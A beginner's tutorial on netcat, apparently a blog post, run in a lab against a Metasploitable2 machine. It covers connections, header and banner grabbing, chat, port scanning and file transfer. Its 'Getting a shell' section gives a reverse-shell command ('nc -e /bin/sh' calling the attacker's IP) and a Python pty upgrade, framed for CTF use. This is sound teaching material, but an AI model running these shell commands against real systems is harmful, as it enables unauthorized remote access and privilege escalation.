Beginners guide to Netcat
In this article we will learn some basic things about netcat and how to get a shell by using it.
Introduction
Starting Netcat
Connect to a server
HTTP Header
Communication via netcat
Getting a shell
Port scanning
Introduction
netcat (also known as nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP.
With the help of Netcat we can investigate a network and can debug it also.
Starting with netcat
To start with the netcat we will type the command nc -h

These are the command options that we can use along with the netcat to perform more operations in a network.
Connect to a server
Here we have used metasploitable2 machine to setup the ftp server , So that we can connect to it. But before connecting let’s check if the port 21 is open or not by running the command
Command used : nmap -p21 192.168.43.235

Here we have configured our metasploitable2 machine with IP address 192.168.43.235. So in the next step we will try to connect with the server using nc.

After providing the correct login credentials we have successfully logged into the server.
HTTP HEADER
We can use nc to fetch the information about the server.
To do this we will use the same machine.
First of all we check if the port 80 is open or not by executing the command nmap -p80 192.168.43.235

port 80 is open. Now let’s fetch the HTTP Header using the command
nc 192.168.43.235 80
HEAD/HTTP/1.1

The option HEAD/HTTP/1.1 gives us the header and the source code of the of the HTTP service running on the server.
Communication via netcat
Netcat can also be used to communicate or to chat between two users , but before doing any kind of communication we need to establish the connection between the two users.So for doing this we need two machines in the same network . we can do this by using virtual box or any other utility.
In this scenario we have to create two users. One will be the listener and another will be the initiator.
Let’s create the listener first using the command:
nc -lvp 4444
l means listen mode
v means verbose mode
p means local port

Now it’s time to setup the initiator using the command
nc 192.168.43.235 4444
Here we have used the IP address of the machine on which we have established the listener and the port we have provided earlier (4444)

Now the connection is established and we can start communicating.


We can see that communication between the two user is successful.
Getting a shell
Netcat can also be used to get a reverse shell. This is very useful while doing CTF challenges. After getting a reverse shell we can do privilege escalation to gain root access.
Here we need two machines . one will be the attacking machine and another one will be the targeted machine.
IP of targeted machine : 192.168.43.235
IP of attacker machine : 192.168.43.8
Execute nc -lvp 4442 on the attacker machine

Now let’s execute the command on target machine
nc -e /bin/sh 192.168.43.8 4442

As we can see that we managed to get a shell of the target machine. Now here we will use python one-liner to get a proper shell.first of all we have to check if the targeted machine is using python2 or python3 and for that we executed the command on the attacker machine
ls /usr/bin/python*

Target machine is using python2 so our next command will be
Python -c’import pty;pty.spawn(“/bin/bash”)’
This will give us the shell access of the target machine.

Port scanning
We can use netcat for port scanning also.netcat can perform TCP and UDP scan.Here we use -z command option for port scanning.
Command used :
nc -v -n -z -w 2 192.168.43.235 21-8081
-v means verbose mode
-n means only numeric IP address
-z used for scanning
-w means time-out

Now to perform UDP scan we will use { -u } command option.

Some more information
Netcat can also be used for file transferring.
We will use two machines. One is Kali Linux and another one is metasploitable2 .
We will create a file hey.txt in metasploitable2 machine and will send the file to Kali Linux machine.
Type nc -v -w 25 -p 8888 -l < hey.txt in metasploitable2 machine

Now to receive the file in kali Linux machine we will execute the command.
nc -v -w 2 192.168.43.235 8888 > hey.txt

After sometime the connection will be closed automatically and we can see the output of hey.txt file by using the cat command.
Netcat can be used for banner grabbing
nc 192.168.43.235 22

So this was a basic guide to netcat. It’s a very useful tool in CTF challenges.